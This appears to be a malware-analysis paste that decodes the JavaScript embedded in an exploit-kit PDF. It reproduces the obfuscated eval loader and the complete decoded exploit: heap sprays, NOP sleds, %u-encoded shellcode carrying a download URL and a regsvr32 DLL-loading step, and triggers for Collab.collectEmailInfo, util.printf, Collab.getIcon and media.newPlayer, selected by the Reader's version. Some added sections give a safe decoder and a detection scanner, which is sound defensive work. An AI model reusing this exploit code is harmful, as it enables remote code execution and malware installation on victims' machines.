MalwareMustDie

MMD - RedKit to BHEK, the BHEK Dl'ed PDF JS/Code Decoding

Dec 30th, 2012
=============================================
#MalwareMustDie | @unixfreaxjp
[0x00000000:0x00400000]>!date
Sun Dec 30 21:49:08 JST 2012
Case: RedKit to BHEK to Khelios: http://malwaremustdie.blogspot.jp/2012/12/what-happened-if-red-kit-team-up-with.html
=============================================

// I found the evil JS code at offset 0x48D of this PDF:

    zxc='a';
    // the payload: every character written as two base-31 digits; the literal is chopped
    // with '+zxc+' (zxc is 'a') so that no single string constant stands out
    a='353d3m3'+zxc+'1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1o1o1j39163o1n1n1o1m163o1n1i1n34163o1n1k1n34163o1j381o1q163o1o1m1o1j163o1n361j39163o1n381n1q163o1o1k1n35163o1k1i1j39163o1o1h1j38163o1o1h1n1p163o1o341k39163o1n1o1n1m163o1o1i1o1i163o1n1p1o34163o1k1k1k37163o1k341k1h163o1n381k1i163o1k1i1k34163o1k341n1q163o1n1q1k1i163o1k1k1k34163o1j1n1k1k163o1o1o1o1m163o1n1k1o1m163o1k1i1k37163o1k341n34163o1n381k1i163o1k1i1k34163o1k341n37163o1n361k1i163o1k1i1k34163o1k341n37163o1o1o1k1j163o1k1k1k34163o1k341k1i163o1n341k1i163o1k1i1k34163o1k341n37163o1n1o1k1i163o1n1k1j1n163o1o1o1n38163o1k1i1k37163o1j1n1n1p163o1o1j1n35163o1n1k1n1i163o1n351k37163o1o1p1n1n163o1j1n1n1q163o1n1i1o34163o1n391n1o163o1n371k37163o1o1k1o1i163o1n341o1i163o1o1o1o1p163o1h1h1n1o163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1'+zxc+'3u3q3b3c3f38193l341f3f383h3'+zxc+'3n3b1b1j1t3k3s1'+zxc+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+zxc+'191h1d3k3s1g1j1'+zxc+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+zxc+'3u3p343l11373e3'+zxc+'1u3h383q11233l3l343s191'+zxc+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+zxc+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3n1t363i3o3h3n1j1s363i3o3h3n1c1c1'+zxc+'3u373e3'+zxc+'2t363i3o3h3n301u3s343l3m3j1c3j343s3f3i3437413p343l113i3p383l393f3i3q1u3o3h383m36343j381913163o1h361h36163o1h361h36131'+zxc+'1s3q3b3c3f38193i3p383l393f3i3q1f3f383h3'+zxc+'3n3b1t1l1l1q1m1j1'+zxc+'3u3i3p383l393f3i3q1c1u3i3p383l393f3i3q413n3b3c3m1f363i3f3f34352l3n3i3l381u253i3f3f34351f363i3f3f38363n273g343c3f2b3h393i193u3m3o353d1r13131d3g3m3'+zxc+'1r3i3p383l393f3i3q411'+zxc+'41393o3h363n3c3i3h113j3l3c3h3n39191'+zxc+'3u3h3i3j1u3o3h383m36343j381913163o1h231h23163o1h231h23163o1h231h23163o1h231h23131'+zxc+'1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3b38343j353f3i363e1u3h3i3j1c3j343s3f3i34371s353c3'+zxc+'353f3i363e1u3o3h383m36343j381913163o1h231h23163o1h231h23131'+zxc+'1s3b383437383l3m3c3t381u1j1h1s3m3j3l343s1u3b383437383l3m3c3t381c3b38343j353f3i363e1f3f383h3'+zxc+'3n3b1s3q3b3c3f3819353c3'+zxc+'353f3i363e1f3f383h3'+zxc+'3n3b1t3m3j3l343s1'+zxc+'3u353c3'+zxc+'353f3i363e1c1u353c3'+zxc+'353f3i363e41393c3f3f353f3i363e1u353c3'+zxc+'353f3i363e1f3m3o353m3n3l3c3h3'+zxc+'191h1d3m3j3l343s1'+zxc+'1s353f3i363e1u353c3'+zxc+'353f3i363e1f3m3o353m3n3l3c3h3'+zxc+'191h1d353c3'+zxc+'353f3i363e1f3f383h3'+zxc+'3n3b1e3m3j3l343s1'+zxc+'1s3q3b3c3f3819353f3i363e1f3f383h3'+zxc+'3n3b1c3m3j3l343s1t1h3r1l1h1h1h1h1'+zxc+'3u353f3i363e1u353f3i363e1c353f3i363e1c393c3f3f353f3i363e413g383g1u3h383q11233l3l343s191'+zxc+'1s393i3l193c1u1h1s3c1t1i1l1h1h1s3c1c1c1'+zxc+'3u3g383g2t3c301u353f3i363e1c3b38343j353f3i363e413p343l113h3o3g1u1i1j1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1q1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1p1s3o3n3c3f1f3j3l3c3h3n391913161l1m1h1h1h39131d3h3o3g1'+zxc+'41393o3h363n3c3i3h113'+zxc+'383n3c363i3h191'+zxc+'3u3p343l11343l3l3s1u3h383q11233l3l343s191'+zxc+'1s3c3919343j3j1f373i361f253i3f3f34351f3'+zxc+'383n2b363i3h1'+zxc+'3u3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113b2p3k1m1h1h252g1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u1h3r1l1h1h1h1h1h1e193b2p3k1m1h1h252g1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l113j1m233d2d1n1m391u191h3r1h361h361h361h361e1h3r1l1h1h1h1h1h1'+zxc+'1g1h3r1l1h1h1h1h1h1s393i3l193p343l113p3k362j261q1n3s1u1h1s3p3k362j261q1n3s1t3j1m233d2d1n1m391s3p3k362j261q1n3s1c1c1'+zxc+'3u343l3l3s2t3p3k362j261q1n3s301u3s343l3m3j1c3j343s3f3i3437413p343l113n2n2f3b2g35293q1u3o3h383m36343j381913161h1q131'+zxc+'1s3q3b3c3f38193n2n2f3b2g35293q1f3f383h3'+zxc+'3n3b1t1h3r1l1h1h1h1'+zxc+'3u3n2n2f3b2g35293q1c1u3n2n2f3b2g35293q413n2n2f3b2g35293q1u132g1f131c3n2n2f3b2g35293q1s343j3j1f373i361f253i3f3f34351f3'+zxc+'383n2b363i3h193n2n2f3b2g35293q1'+zxc+'4141342i3f3o3'+zxc+'3c3h3m1u343j3j1f3j3f3o3'+zxc+'2b3h3m1s3p343l113m3p1u3j343l3m382b3h3n19343j3j1f3p3c383q383l2o383l3m3c3i3h1f3n3i2l3n3l3c3h3'+zxc+'191'+zxc+'1f363b343l233n191h1'+zxc+'1'+zxc+'1s393i3l193p343l113c1u1h1s3c1t342i3f3o3'+zxc+'3c3h3m1f3f383h3'+zxc+'3n3b1s3c1c1c1'+zxc+'3u3c3919342i3f3o3'+zxc+'3c3h3m2t3c301f3h343g381u1u18272l363l3c3j3n181'+zxc+'3u3p343l113f3p1u342i3f3o3'+zxc+'3c3h3m2t3c301f3p383l3m3c3i3h41413c3919193f3p1u1u1q1'+zxc+'404019193m3p1u1u1p1'+zxc+'1717193f3p1t1u1p1f1i1j1'+zxc+'1'+zxc+'1'+zxc+'3u3'+zxc+'383n3c363i3h191'+zxc+'41383f3m38113c39193f3p1u1u1o1f1i1'+zxc+'3u3j3l3c3h3n39191'+zxc+'41383f3m38113c391919193m3p1u1u1n1'+zxc+'4040193m3p1u1u1o1'+zxc+'1'+zxc+'1717193f3p1t1o1f1i1i1'+zxc+'1'+zxc+'3u353r191'+zxc+'41383f3m38113c3919193f3p201u1q1f1i1'+zxc+'4040193f3p1t1u1q1f1j1'+zxc+'4040193f3p201u1p1f1i1k1'+zxc+'4040193f3p1t1u1p1f1i1o1'+zxc+'1'+zxc+'3u393o3h363n3c3i3h1134191'+zxc+'3u3o3n3c3f1f3j3l3c3h3n3719183j221i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i1i111r113s3s3s3s1i1i1i181d3h383q1126343n38191'+zxc+'1'+zxc+'413p343l113b1u343j3j1f3j3f3o3'+zxc+'2b3h3m1s393i3l193p343l11391u1h1s391t3b1f3f383h3'+zxc+'3n3b1s391c1c1'+zxc+'3u3c39193b2t39301f3h343g381u1u18272l363l3c3j3n181'+zxc+'3u3p343l113c1u3b2t39301f3p383l3m3c3i3h41413c3919193c201p1f1i1j1'+zxc+'1717193c1t1p1f1j1'+zxc+'1'+zxc+'3u361u3h383q11233l3l343s191'+zxc+'1s3p343l11371u3o3h383m36343j381918163o1q1h1q1h163o1q1h1q1h181'+zxc+'1s3p343l11381u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3q3b3c3f3819371f3f383h3'+zxc+'3n3b1t1u1h3r1p1h1h1h1'+zxc+'3u371c1u3741371u371f3m3o353m3n3l191h1d1h3r1p1h1h1h1e381f3f383h3'+zxc+'3n3b1'+zxc+'1s393i3l19391u1h1s391t1j1q1h1h1s391c1c1'+zxc+'3u362t39301u371c384134191'+zxc+'1s34191'+zxc+'1s3n3l3s3u3n3b3c3m1f3g38373c341f3h383q2i3f343s383l193h3o3f3f1'+zxc+'4136343n363b19381'+zxc+'3u4134191'+zxc+'4141';
    s='';
    p=parseInt;
    for(i=0;i<a.length;i+=2){
        var jj = 0;
        // environment check: the SpiderMonkey build inside Acrobat stringifies a native
        // function starting with a newline, so ("\nfunction newDoc..."+'asd').substr(1,3)
        // is "fun"; in a browser or Node it is "unc", jj stays 0 and nothing is decoded
        if((app.newDoc+'asd')['substr'](1,3)=='fun'){jj=1}
        if (jj==1) s+=String.fromCharCode(p(a[i]+a[i+01],31));   // two digits, base 31 -> one char code
    }
    ev=String.fromCharCode(100+1,118,97,108);   // "eval"
    if(020!==0x10)ev=13;                        // octal 020 == 0x10, so ev stays "eval"
    t=this;
    zxczxc={t:t}.t;                             // t is the Doc object
    zxczxc[ev](s);                              // this.eval(s): run the decoded exploit

// I "modified" the code to strip the traps & go
// straight to the point...

// (browser version: the Acrobat-only check is commented out and document.write()
//  replaces the eval call, so the decoded source is printed instead of executed)

zxc='a';
a='353d3m3'+zxc+'...';   // the same encoded string as in the original block above, unchanged
s='';
p=parseInt;
for(i=0;i<a.length;i+=2){
    var jj = 0;
    //if((app.newDoc+'asd')['substr'](1,3)=='fun')
    {jj=1}
    if (jj==1) s+=String.fromCharCode(p(a[i]+a[i+01],31));
}
document.write(s);

    ↓↓↓

// Decoding gives:
//  1) the shellcode (the bjsg string), and
//  2) the exploit code: Collab.getIcon (CVE-2009-0927) and Collab.collectEmailInfo (CVE-2007-5659),
//     plus util.printf and media.newPlayer branches chosen by the Reader/EScript version


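The decoder loop above, as an added example that is not part of the original paste: a trap-free, eval-free Node re-implementation of the base-31 pair scheme, with the inverse so the encoding can be checked offline, the `'+zxc+'` splicing undone, and the `app.newDoc` environment trap shown as a pure function. The sample string built at the bottom is constructed for the demo and is not the real payload.

```javascript
// Added example (not code from the paste): a trap-free, eval-free Node re-implementation
// of the decoder loop above, plus the inverse, so the encoding can be checked offline.

// Undo the "'+zxc+'" splicing. In the paste zxc === 'a', so every "'+zxc+'" token inside
// the literal stands for the single base-31 digit 'a'. Input is the text of the a='...'; line
// (a bare digit string is accepted too).
function unsplice(literalSource, zxc = 'a') {
  const m = literalSource.match(/'([\s\S]*)'\s*;?\s*$/);
  const body = m ? m[1] : literalSource;
  return body.split("'+zxc+'").join(zxc);
}

// Decode: take the digits two at a time, parse them as base 31, emit the character.
// Same arithmetic as String.fromCharCode(parseInt(a[i]+a[i+1], 31)) in the paste,
// but the result is returned instead of being handed to eval().
function decodeBase31Pairs(encoded) {
  if (encoded.length % 2 !== 0) throw new Error('odd-length input');
  let out = '';
  for (let i = 0; i < encoded.length; i += 2) {
    const pair = encoded.slice(i, i + 2);
    if (!/^[0-9a-u]{2}$/i.test(pair)) throw new Error('bad base-31 pair "' + pair + '" at ' + i);
    out += String.fromCharCode(parseInt(pair, 31));
  }
  return out;
}

// The inverse, to make the scheme explicit: char code -> two base-31 digits.
// Only codes below 31*31 = 961 fit in two digits, which covers the ASCII exploit source.
function encodeBase31Pairs(text) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    if (code >= 31 * 31) throw new Error('char code ' + code + ' does not fit two base-31 digits');
    out += code.toString(31).padStart(2, '0');
  }
  return out;
}

// The environment trap:  (app.newDoc+'asd')['substr'](1,3)=='fun'
// The SpiderMonkey build inside Acrobat stringifies a native function starting with a
// newline, so substr(1,3) of "\nfunction newDoc() {...}" is "fun". In Node or a browser
// toString() starts with "function", substr(1,3) is "unc", jj stays 0 and nothing is
// decoded. That is the check the "modified" version above comments out.
function passesAcrobatTrap(fnSource) {
  return (String(fnSource) + 'asd').substr(1, 3) === 'fun';
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed sample (not the real payload), written out in the paste's spliced layout.
  const sample = "a='" + encodeBase31Pairs("app.alert('decoded')").split('a').join("'+zxc+'") + "';";
  console.log(sample);
  console.log(decodeBase31Pairs(unsplice(sample)));                       // app.alert('decoded')
  console.log(passesAcrobatTrap('\nfunction newDoc() { [native code] }')); // true (Acrobat-style)
  console.log(passesAcrobatTrap(function newDoc() {}));                   // false (Node-style)
}
```

To decode the real sample, paste the `a='...';` line from the PDF into `unsplice()` and feed the result to `decodeBase31Pairs()`; nothing is evaluated, the exploit source comes back as a string.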
// shellcode...

bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u772f%u6675%u616a%u636a%u2e79%u7572%u6c2f%u6e69%u736b%u312f%u702e%u7068%u7a3f%u6765%u7171%u687a%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7775%u6375%u313d%u3a6a%u6e31%u313a%u3a6d%u6c31%u313a%u3a6d%u7732%u333a%u3a31%u6a31%u313a%u3a6d%u6731%u6326%u776e%u313d%u2668%u726b%u6361%u6b3d%u7866%u2669%u617a%u6f67%u6d3d%u7371%u6a71%u7778%u0067%u0000';

// exploit

// pad ra by doubling until it covers qy bytes, then cut it to qy/2 UTF-16 units
function ezvr(ra,qy)
{
  while(ra.length*2<qy)
  {
    ra+=ra
  }
  ra=ra.substring(0,qy/2);
  return ra
}

// Collab.collectEmailInfo (CVE-2007-5659): spray the heap up to 0x0c0c0c0c with
// NOP sled + shellcode, then pass an oversized msg made of 0x0c0c0c0c
function bx()
{
  var dkg=new Array();
  var vw=0x0c0c0c0c;                       // spray target address
  var addr=0x400000;                       // 4 MB per spray block
  var payload=unescape(bjsg);
  var sc_len=payload.length*2;
  var qy=addr-(sc_len+0x38);               // sled size so sled+shellcode fills one block
  var yarsp=unescape("%u9090%u9090");      // NOP sled
  yarsp=ezvr(yarsp,qy);
  var count2=(vw-0x400000)/addr;           // number of blocks needed to reach vw
  for(var count=0;count<count2;count++)
  {
    dkg[count]=yarsp+payload
  }
  var overflow=unescape("%u0c0c%u0c0c");
  while(overflow.length<44952)
  {
    overflow+=overflow
  }
  // Here's where the Collab.collectEmailInfo CVE-2007-5659 trigger starts......
  this.collabStore=Collab.collectEmailInfo(
  {
    subj:"",msg:overflow
  }
  )
}

// util.printf: spray with 0x0A0A0A0A, then an oversized number through a "%45000f" format
function printf()
{
  nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  var payload=unescape(bjsg);
  heapblock=nop+payload;
  bigblock=unescape("%u0A0A%u0A0A");
  headersize=20;
  spray=headersize+heapblock.length;
  while(bigblock.length<spray)
  {
    bigblock+=bigblock
  }
  fillblock=bigblock.substring(0,spray);
  block=bigblock.substring(0,bigblock.length-spray);
  while(block.length+spray<0x40000)
  {
    block=block+block+fillblock
  }
  mem=new Array();
  for(i=0;i<1400;i++)
  {
    mem[i]=block+heapblock
  }
  // ↓ the flood of characters for the BoF
  var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
  util.printf("%45000f",num)
}

// Here's the Collab.getIcon exploit CVE-2009-0927
function geticon()
{
  var arry=new Array();
  if(app.doc.Collab.getIcon)
  {
    var payload=unescape(bjsg);
    var hWq500CN=payload.length*2;
    var qy=0x400000-(hWq500CN+0x38);
    var yarsp=unescape("%u9090%u9090");
    yarsp=ezvr(yarsp,qy);
    var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;   // same spray geometry as bx()
    for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++)
    {
      arry[vqcQD96y]=yarsp+payload
    }
    var tUMhNbGw=unescape("%09");          // oversized argument for getIcon: "N." + 0x4000 tab characters
    while(tUMhNbGw.length<0x4000)
    {
      tUMhNbGw+=tUMhNbGw
    }
    tUMhNbGw="N."+tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw)
  }
}

// pick the exploit from the viewer major version (sv) and the EScript plug-in version (lv)
aPlugins=app.plugIns;
var sv=parseInt(app.viewerVersion.toString().charAt(0));
for(var i=0;i<aPlugins.length;i++)
{
  if(aPlugins[i].name=='EScript')
  {
    var lv=aPlugins[i].version
  }
}
if((lv==9)||((sv==8)&&(lv<=8.12)))
{
  geticon()
}
else if(lv==7.1)
{
  printf()
}
else if(((sv==6)||(sv==7))&&(lv<7.11))
{
  bx()
}
else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17))   // this OR chain is true for any version; only the check below matters
{
  // media.newPlayer(null) branch, taken only for 8.12 < EScript < 8.2
  function a()
  {
    util.printd('p@111111111111111111111111 : yyyy111',new Date())
  }
  var h=app.plugIns;
  for(var f=0;f<h.length;f++)
  {
    if(h[f].name=='EScript')
    {
      var i=h[f].version
    }
  }
  if((i>8.12)&&(i<8.2))
  {
    c=new Array();
    var d=unescape('%u9090%u9090');
    var e=unescape(bjsg);
    while(d.length<=0x8000)
    {
      d+=d
    }
    d=d.substr(0,0x8000-e.length);
    for(f=0;f<2900;f++)
    {
      c[f]=d+e
    }
    a();
    a();
    try
    {
      this.media.newPlayer(null)
    }
    catch(e)
    {
    }
    a()
  }
}

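The version dispatch at the bottom of the exploit, as an added example that is not code from the paste: the same comparisons lifted out of Acrobat's `app` object into a pure function so they can be run offline against candidate Reader versions, plus a small indicator scan for the API calls and spray idioms used above. The indicator list, the function names and the sample snippet are mine; `sv` and `lv` are the viewer major version and the EScript plug-in version, read the way the exploit reads them.

```javascript
// Added example (not code from the paste): the exploit's version dispatch as a pure
// function, and a triage scan for the Acrobat-JS exploit idioms seen in this sample.

// Comparisons copied as written. Note the last `else if`: an OR chain of >= and <= over
// overlapping ranges is true for every number, so only its inner check decides anything.
function selectExploit(sv, lv) {
  if (lv === 9 || (sv === 8 && lv <= 8.12)) return 'geticon';   // Collab.getIcon
  if (lv === 7.1) return 'printf';                             // util.printf
  if ((sv === 6 || sv === 7) && lv < 7.11) return 'bx';        // Collab.collectEmailInfo
  if (lv >= 9.1 || lv <= 9.2 || lv >= 8.13 || lv <= 8.17) {   // always true
    return (lv > 8.12 && lv < 8.2) ? 'newPlayer' : 'none';     // media.newPlayer(null)
  }
  return 'none';
}

// Indicator names are mine; each pattern matches an idiom present in the decoded code above.
const INDICATORS = [
  ['Collab.getIcon',            /Collab\s*\.\s*getIcon\s*\(/],
  ['Collab.collectEmailInfo',   /Collab\s*\.\s*collectEmailInfo\s*\(/],
  ['util.printf huge format',   /util\s*\.\s*printf\s*\(\s*["']%\d{4,}f/],
  ['media.newPlayer(null)',     /media\s*\.\s*newPlayer\s*\(\s*null\s*\)/],
  ['NOP sled %u9090',           /unescape\s*\(\s*["'](?:%u9090)+["']\s*\)/i],
  ['spray target 0x0c0c0c0c',   /0x0c0c0c0c|%u0c0c%u0c0c/i],
  ['%u-encoded shellcode',      /(?:%u[0-9a-f]{4}){32,}/i],
  ['EScript version probe',     /\.name\s*==\s*['"]EScript['"]/],
  ['app.newDoc stringify trap', /app\s*\.\s*newDoc\s*\+\s*['"]/],
];

// Returns the names of all indicators that fire on the given (already decoded) JavaScript.
function triage(js) {
  return INDICATORS.filter(([, re]) => re.test(js)).map(([name]) => name);
}

// Constructed sample: a few lines in the shape of the decoded exploit above.
const SAMPLE_JS = [
  'var yarsp=unescape("%u9090%u9090");',
  'var overflow=unescape("%u0c0c%u0c0c");',
  'this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});',
  'util.printf("%45000f",num);',
  "if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version}",
  'try{this.media.newPlayer(null)}catch(e){}',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triage(SAMPLE_JS));
  for (const [sv, lv] of [[9, 9], [8, 7.1], [7, 7.1], [7, 7.0], [9, 8.15], [9, 9.3]]) {
    console.log('viewer', sv, 'EScript', lv, '->', selectExploit(sv, lv));
  }
}
```

Two things the table makes visible that the original `if` ladder hides: a Reader 8 install with an old EScript (7.1) never reaches the `printf()` branch because the first condition wins, and anything not caught by the first three branches falls into the last one, where only EScript versions strictly between 8.12 and 8.2 trigger `media.newPlayer(null)`; every other version does nothing.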
// grab the shellcode string (bjsg above), strip the "%u" and save it as binary
// (each %uXXYY token is a little-endian 16-bit word, so the bytes come out as YY XX).
// View it in a binary viewer and you'll find this:

66 83 e4 fc fc 85 e4 75  34 e9 5f 33 c0 64 8b 40   f......u4._3.d.@
30 8b 40 0c 8b 70 1c 56  8b 76 08 33 db 66 8b 5e   0.@..p.V.v.3.f.^
3c 03 74 33 2c 81 ee 15  10 ff ff b8 8b 40 30 c3   <.t3,........@0.
46 39 06 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51   F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78  03 f5 56 8b 76 20 03 f5   V.u<.t5x..V.v...
33 c9 49 41 fc ad 03 c5  33 db 0f be 10 38 f2 74   3.IA....3....8.t
08 c1 cb 0d 03 da 40 eb  f1 3b 1f 75 e6 5e 8b 5e   ......@..;.u.^.^
24 03 dd 66 8b 0c 4b 8d  46 ec ff 54 24 0c 8b d8   $..f..K.F..T$...
03 dd 8b 04 8b 03 c5 ab  5e 59 c3 eb 53 ad 8b 68   ........^Y..S..h
20 80 7d 0c 33 74 03 96  eb f3 8b 68 08 8b f7 6a   ..}.3t.....h...j
05 59 e8 98 ff ff ff e2  f9 e8 00 00 00 00 58 50   .Y............XP
6a 40 68 ff 00 00 00 50  83 c0 19 50 55 8b ec 8b   j@h....P...PU...
5e 10 83 c3 05 ff e3 68  6f 6e 00 00 68 75 72 6c   ^......hon..hurl
6d 54 ff 16 83 c4 08 8b  e8 e8 61 ff ff ff eb 02   mT........a.....
eb 72 81 ec 04 01 00 00  8d 5c 24 0c c7 04 24 72   .r.......\$...$r
65 67 73 c7 44 24 04 76  72 33 32 c7 44 24 08 20   egs.D$.vr32.D$..
2d 73 20 53 68 f8 00 00  00 ff 56 0c 8b e8 33 c9   -s.Sh.....V...3.
51 c7 44 1d 00 77 70 62  74 c7 44 1d 05 2e 64 6c   Q.D..wpbt.D...dl
6c c6 44 1d 09 00 59 8a  c1 04 30 88 44 1d 04 41   l.D...Y...0.D..A
